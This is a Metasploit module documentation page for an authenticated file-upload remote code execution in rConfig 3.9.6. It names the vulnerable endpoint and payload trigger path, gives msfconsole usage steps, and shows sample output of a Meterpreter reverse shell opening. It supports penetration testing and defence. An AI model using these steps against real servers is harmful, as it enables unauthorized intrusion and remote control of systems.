metasploit-gs/documentation/modules/exploit/linux/http/rconfig_authenticated_rce.md

Vulnerable Application

Description

This module allows an attacker with a privileged rConfig account to start a reverse shell due to an arbitrary file upload vulnerability in /lib/crud/vendors.crud.php. Then, the uploaded payload can be triggered by a call to images/vendor/<payload_file>.php

Installation

Vulnerable versions of rConfig can be downloaded from here. Then, help yourself with this installation guide. You can also use this docker file (as long as it is not updated and remains a 3.9.6 version of rConfig)

Verification Steps

List the steps needed to make sure this thing works

1. Start msfconsole
2. use exploit/linux/http/rconfig_authenticated_rce
3. set USERNAME <admin_username>
4. set PASSWORD <admin_password>
5. set TARGETURI <base_path_rconfig> if the base path of rConfig web server is different from /
6. check to check if the targeted rConfig server is vulnerable
7. run the module to exploit the vulnerability and start a reverse shell

Options

USERNAME

Set the USERNAME of your admin account.

PASSWORD

Set the PASSWORD of your admin account.

Scenarios

This module was successfully tested on CentOS 7 with rConfig 3.9.6. See the following output :

msf6 exploit(rconfig_authenticated_rce) > run

[*] Started reverse TCP handler on X.X.X.X:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 3.9.6 of rConfig found !
[+] The target is vulnerable.
[+] We successfully logged in !
[*] Uploading file 'uaxsv.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to Y.Y.Y.Y
[*] Meterpreter session 13 opened (X.X.X.X:4444 -> Y.Y.Y.Y:38310) at 2021-06-17 14:41:00 +0200

meterpreter > getuid
Server username: apache (48)